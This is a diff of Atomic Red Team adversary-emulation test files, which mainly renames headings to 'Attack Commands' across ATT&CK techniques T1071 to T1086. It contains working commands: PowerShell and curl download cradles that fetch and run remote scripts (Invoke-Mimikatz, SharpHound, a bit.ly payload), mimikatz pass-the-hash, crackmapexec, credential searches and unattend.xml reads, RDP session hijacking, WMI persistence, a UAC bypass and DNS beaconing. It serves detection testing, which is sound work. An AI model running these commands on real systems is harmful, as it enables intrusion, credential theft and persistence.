@@ -43,6 +44,9 @@ Invoke-WebRequest #{domain} -UserAgent "*<|>*" | out-null
<br/>
<br/>
@@ -53,12 +57,13 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | Default domain to simulate against | string | www.google.com|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
curl -s -A "HttpBrowser/1.0" -m3 #{domain}
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain}
@@ -68,6 +73,9 @@ curl -s -A "*<|>*" -m3 #{domain}
<br/>
<br/>
@@ -78,12 +86,13 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | Default domain to simulate against | string | www.google.com|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
curl -s -A "HttpBrowser/1.0" -m3 #{domain}
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain}
@@ -93,6 +102,9 @@ curl -s -A "*<|>*" -m3 #{domain}
<br/>
<br/>
@@ -103,7 +115,7 @@ The intent of this test is to trigger threshold based detection on the number of
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | Default domain to simulate against | string | example.com|
@@ -111,13 +123,17 @@ The intent of this test is to trigger threshold based detection on the number of
| query_type | DNS query type | string | TXT|
| query_volume | Number of DNS queries to send | integer | 1000|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout}
```
<br/>
<br/>
@@ -128,7 +144,7 @@ This behaviour is typical of implants either in an idle state waiting for instru
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | Default domain to simulate against | string | example.com|
@@ -138,7 +154,8 @@ This behaviour is typical of implants either in an idle state waiting for instru
| c2_jitter | Percentage of jitter to add to the C2 interval to create variance in the times between C2 requests | integer | 20|
| runtime | Time in minutes to run the simulation | integer | 30|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
Set-Location $PathToAtomicsFolder
.\T1071\src\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
@@ -146,6 +163,9 @@ Set-Location $PathToAtomicsFolder
<br/>
<br/>
@@ -156,14 +176,15 @@ The simulation involves sending DNS queries that gradually increase in length un
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | Default domain to simulate against | string | example.com|
| subdomain | Subdomain prepended to the domain name (should be 63 characters to test maximum length) | string | atomicredteamatomicredteamatomicredteamatomicredteamatomicredte|
| query_type | DNS query type | string | TXT|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
Set-Location $PathToAtomicsFolder
.\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}
@@ -171,4 +192,7 @@ Set-Location $PathToAtomicsFolder
<br/>
atomics/T1073/T1073.md
+7 -3
View File
@@ -17,20 +17,24 @@ GUP is an open source signed binary used by Notepad++ for software updates, and
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| process_name | Name of the created process | string | calculator.exe|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
$PathToAtomicsFolder\T1073\bin\GUP.exe
```
#### Cleanup Commands:
```
taskkill /F /IM #{process_name}
```
<br/>
atomics/T1074/T1074.md
+16 -4
View File
@@ -21,13 +21,17 @@ Utilize powershell to download discovery.bat and save to a local file
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat') > pi.log
```
<br/>
<br/>
@@ -37,13 +41,17 @@ Utilize curl to download discovery.sh and execute a basic information gathering
**Supported Platforms:** Linux, macOS
#### Run it with `bash`!
#### Attack Commands: Run with `bash`!
```
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.sh | bash -s > /tmp/discovery.log
```
<br/>
<br/>
@@ -53,15 +61,19 @@ Use living off the land tools to zip a file and stage it in the Windows temporar
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_zip -DestinationPath $env:TEMP\Folder_to_zip.zip
```
#### Cleanup Commands:
```
Remove-Item -Path $env:TEMP\Folder_to_zip.zip
```
<br/>
atomics/T1075/T1075.md
+22 -6
View File
@@ -20,20 +20,24 @@ Note: must dump hashes first
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | username | string | Administrator|
| domain | domain | string | atomic.local|
| ntlm | ntlm hash | string | cc36cf7a8514893efccd3324464tkg1a|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
```
<br/>
<br/>
@@ -43,23 +47,35 @@ command execute with crackmapexec
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | username | string | Administrator|
| domain | domain | string | atomic.local|
| ntlm | command | string | cc36cf7a8514893efccd3324464tkg1a|
| command | command to execute | string | whoami|
| crackmapexec_exe | crackmapexec windows executable | Path | C:\CrackMapExecWin\crackmapexec.exe|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command}
```
#### Commands to Check Prerequisites:
#### Dependencies: Run with `powershell`!
##### Description: CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe})
##### Check Prereq Commands:
```
powershell -c if(Test-Path C:\CrackMapExecWin\crackmapexec.exe) { 0 } else { -1 }
if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 }
```
##### Get Prereq Commands:
```
Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe}
```
<br/>
atomics/T1075/T1075.yaml
+13 -2
View File
@@ -54,12 +54,23 @@ atomic_tests:
description: command to execute
type: string
default: whoami
crackmapexec_exe:
description: crackmapexec windows executable
type: Path
default: C:\CrackMapExecWin\crackmapexec.exe
dependency_executor_name: powershell
dependencies:
- description: |
CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe})
prereq_command: |
if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 }
get_prereq_command: |
Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe}
executor:
name: command_prompt
elevation_required: false
prereq_command: |
powershell -c if(Test-Path C:\CrackMapExecWin\crackmapexec.exe) { 0 } else { -1 }
command: |
crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command}
atomics/T1076/T1076.md
+21 -6
View File
@@ -21,19 +21,23 @@ RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-r
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
query user
sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55"
net start sesshijack
```
#### Cleanup Commands:
```
sc.exe delete sesshijack
```
<br/>
<br/>
@@ -43,21 +47,32 @@ Attempt an RDP session via "Connect-RDP" to a system. Default RDPs to (%logonser
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| logonserver | ComputerName argument default %logonserver% | String | $ENV:logonserver.TrimStart("\")|
| username | Username argument default %USERDOMAIN%\%username% | String | $Env:USERDOMAIN\$ENV:USERNAME|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
Connect-RDP -ComputerName #{logonserver} -User #{username}
```
#### Commands to Check Prerequisites:
#### Dependencies: Run with `powershell`!
##### Description: Computer must be domain joined
##### Check Prereq Commands:
```
if((Get-WmiObject -Class Win32_ComputerSystem).PartOfDomain) {0} else {1}
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {0} else {1}
```
##### Get Prereq Commands:
```
Write-Host Joining this computer to a domain must be done manually
```
<br/>
atomics/T1076/T1076.yaml
+9 -2
View File
@@ -32,10 +32,17 @@ atomic_tests:
description: Username argument default %USERDOMAIN%\%username%
type: String
default: $Env:USERDOMAIN\$ENV:USERNAME
dependencies:
- description: |
Computer must be domain joined
prereq_command: |
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {0} else {1}
get_prereq_command: |
Write-Host Joining this computer to a domain must be done manually
executor:
name: powershell
elevation_required: false
prereq_command: |
if((Get-WmiObject -Class Win32_ComputerSystem).PartOfDomain) {0} else {1}
command: |
Connect-RDP -ComputerName #{logonserver} -User #{username}
atomics/T1077/T1077.md
+24 -8
View File
@@ -25,7 +25,7 @@ Connecting To Remote Shares
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| share_name | Examples C$, IPC$, Admin$ | String | C$|
@@ -33,13 +33,17 @@ Connecting To Remote Shares
| password | Password | String | P@ssw0rd1|
| computer_name | Target Computer Name | String | Target|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
```
<br/>
<br/>
@@ -49,20 +53,24 @@ Map Admin share utilizing PowerShell
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| share_name | Examples C$, IPC$, Admin$ | String | C$|
| computer_name | Target Computer Name | String | Target|
| map_name | Mapped Drive Letter | String | g|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
```
<br/>
<br/>
@@ -72,19 +80,23 @@ Copies a file to a remote host and executes it using PsExec. Requires the downlo
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_host | Remote computer to receive the copy and execute the file | String | \\localhost|
| command_path | File to copy and execute | Path | C:\Windows\System32\cmd.exe|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
psexec.exe #{remote_host} -c #{command_path}
```
<br/>
<br/>
@@ -95,17 +107,21 @@ This technique is used by post-exploitation frameworks.
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Remote computer to receive the copy and execute the file | String | output.txt|
| command_to_execute | Command to execute for output. | String | hostname|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
```
<br/>
atomics/T1081/T1081.md
+21 -5
View File
@@ -27,13 +27,17 @@ In cloud environments, authenticated user credentials are often stored in local
**Supported Platforms:** macOS
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
python2 laZagne.py all
```
<br/>
<br/>
@@ -43,18 +47,22 @@ Extracting credentials from files
**Supported Platforms:** macOS, Linux
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_path | Path to search | String | /|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
grep -ri password #{file_path}
```
<br/>
<br/>
@@ -64,7 +72,8 @@ Extracting Credentials from Files
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
findstr /si pass *.xml | *.doc | *.txt | *.xls
ls -R | select-string -Pattern password
@@ -72,6 +81,9 @@ ls -R | select-string -Pattern password
<br/>
<br/>
@@ -81,7 +93,8 @@ Attempts to access unattend.xml, where credentials are commonly stored, within t
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
type C:\Windows\Panther\unattend.xml > nul 2>&1
type C:\Windows\Panther\Unattend\unattend.xml > nul 2>&1
@@ -89,4 +102,7 @@ type C:\Windows\Panther\Unattend\unattend.xml > nul 2>&1
<br/>
atomics/T1082/T1082.md
+40 -8
View File
@@ -49,7 +49,8 @@ Identify System Info
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
systeminfo
reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum
@@ -57,6 +58,9 @@ reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum
<br/>
<br/>
@@ -66,7 +70,8 @@ Identify System Info
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
systemsetup
system_profiler
@@ -75,6 +80,9 @@ ls -al /Applications
<br/>
<br/>
@@ -84,7 +92,8 @@ Identify System Info
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
uname -a >> /tmp/loot.txt
cat /etc/lsb-release >> /tmp/loot.txt
@@ -95,6 +104,9 @@ cat /etc/issue >> /tmp/loot.txt
<br/>
<br/>
@@ -104,7 +116,8 @@ Identify virtual machine hardware. This technique is used by the Pupy RAT and ot
**Supported Platforms:** Linux
#### Run it with `bash`!
#### Attack Commands: Run with `bash`!
```
cat /sys/class/dmi/id/bios_version | grep -i amazon
cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware"
@@ -118,6 +131,9 @@ sudo lscpu | grep -i "Xen\|KVM\|Microsoft"
<br/>
<br/>
@@ -127,7 +143,8 @@ Identify virtual machine guest kernel modules. This technique is used by the Pup
**Supported Platforms:** Linux
#### Run it with `bash`!
#### Attack Commands: Run with `bash`!
```
sudo lsmod | grep -i "vboxsf\|vboxguest"
sudo lsmod | grep -i "vmw_baloon\|vmxnet"
@@ -138,6 +155,9 @@ sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"
<br/>
<br/>
@@ -147,13 +167,17 @@ Identify system hostname for Windows.
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
hostname
```
<br/>
<br/>
@@ -163,13 +187,17 @@ Identify system hostname for Linux and macOS systems.
**Supported Platforms:** Linux, macOS
#### Run it with `bash`!
#### Attack Commands: Run with `bash`!
```
hostname
```
<br/>
<br/>
@@ -179,11 +207,15 @@ Identify the Windows MachineGUID value for a system.
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid
```
<br/>
atomics/T1083/T1083.md
+20 -4
View File
@@ -29,7 +29,8 @@ Find or discover files on the file system
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
dir /s c:\ >> %temp%\download
dir /s "c:\Documents and Settings" >> %temp%\download
@@ -43,6 +44,9 @@ tree /F >> %temp%\download
<br/>
<br/>
@@ -52,7 +56,8 @@ Find or discover files on the file system
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
ls -recurse
get-childitem -recurse
@@ -61,6 +66,9 @@ gci -recurse
<br/>
<br/>
@@ -76,7 +84,8 @@ https://perishablepress.com/list-files-folders-recursively-terminal/
**Supported Platforms:** macOS, Linux
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
ls -a > allcontents.txt
ls -la /Library/Preferences/ > detailedprefsinfo.txt
@@ -89,6 +98,9 @@ which sh
<br/>
<br/>
@@ -98,7 +110,8 @@ Find or discover files on the file system
**Supported Platforms:** macOS, Linux
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > /tmp/loot.txt
cat /etc/mtab > /tmp/loot.txt
@@ -108,4 +121,7 @@ find . -type f -name ".*"
<br/>
atomics/T1084/T1084.md
+6 -2
View File
@@ -23,7 +23,8 @@ https://github.com/EmpireProject/Empire/blob/master/data/module_source/persisten
**Supported Platforms:** Windows
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
EventNameSpace='root\CimV2';
@@ -42,7 +43,6 @@ Consumer = [Ref] $Consumer;
$FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs
```
#### Cleanup Commands:
```
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
@@ -54,4 +54,8 @@ $EventConsumerToCleanup | Remove-WmiObject
$EventFilterToCleanup | Remove-WmiObject
```
<br/>
atomics/T1085/T1085.md
+36 -12
View File
@@ -29,18 +29,22 @@ Test execution of a remote script using rundll32.exe
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_url | location of the payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/src/T1085.sct|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
```
<br/>
<br/>
@@ -52,18 +56,22 @@ Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command_to_execute | Command for rundll32.exe to execute | string | calc.exe|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0)
```
<br/>
<br/>
@@ -75,18 +83,22 @@ Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1085\src\T1085.inf|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
```
<br/>
<br/>
@@ -98,18 +110,22 @@ Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1085\src\T1085.inf|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
```
<br/>
<br/>
@@ -121,18 +137,22 @@ Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1085\src\T1085_DefaultInstall.inf|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\#{inf_to_execute}
```
<br/>
<br/>
@@ -144,16 +164,20 @@ Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1085\src\T1085_DefaultInstall.inf|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\#{inf_to_execute}
```
<br/>
atomics/T1086/T1086.md
+98 -31
View File
@@ -49,18 +49,22 @@ Download Mimikatz and dump credentials
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| mimurl | Mimikatz url | url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
```
<br/>
<br/>
@@ -70,18 +74,22 @@ Download Bloodhound and run it
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| bloodurl | BloodHound URL | url | https://raw.githubusercontent.com/BloodHoundAD/BloodHound/a7ea5363870d925bc31d3a441a361f38b0aadd0b/Ingestors/SharpHound.ps1|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound"
```
<br/>
<br/>
@@ -92,7 +100,8 @@ Reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FR
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()
@@ -101,6 +110,9 @@ Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set
<br/>
<br/>
@@ -110,13 +122,17 @@ Run mimikatz via PsSendKeys
**Supported Platforms:** Windows
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
```
<br/>
<br/>
@@ -127,13 +143,17 @@ Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-pat
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
```
<br/>
<br/>
@@ -143,7 +163,7 @@ Using PS 5.1, add a user via CLI
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | username to add | string | atomic_user|
@@ -151,13 +171,17 @@ Using PS 5.1, add a user via CLI
| password | password to use | string | ATOM1CR3DT3@M|
| description | Brief description of account | string | Atomic Things|
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password #{password} -Description '#{description}'
```
<br/>
<br/>
@@ -169,18 +193,22 @@ Not proxy aware removing cache although does not appear to write to those locati
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
```
<br/>
<br/>
@@ -192,18 +220,22 @@ Not proxy aware removing cache although does not appear to write to those locati
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
```
<br/>
<br/>
@@ -214,18 +246,22 @@ Powershell xml download request
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
```
<br/>
<br/>
@@ -236,18 +272,22 @@ Powershell invoke mshta to download payload
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
```
<br/>
<br/>
@@ -258,14 +298,15 @@ Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
**Supported Platforms:** Windows
#### Run it with these steps!
1. Open Powershell_ise as a Privileged Account
#### Run it with these steps! 1. Open Powershell_ise as a Privileged Account
2. Invoke-DownloadCradle.ps1
<br/>
<br/>
@@ -275,20 +316,24 @@ Execution of a PowerShell payload from the Windows Registry similar to that seen
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI="
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
```
#### Cleanup Commands:
```
cmd /c del /Q /F %SystemRoot%\Temp\art-marker.txt
cmd /c REG DELETE "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /f
```
<br/>
<br/>
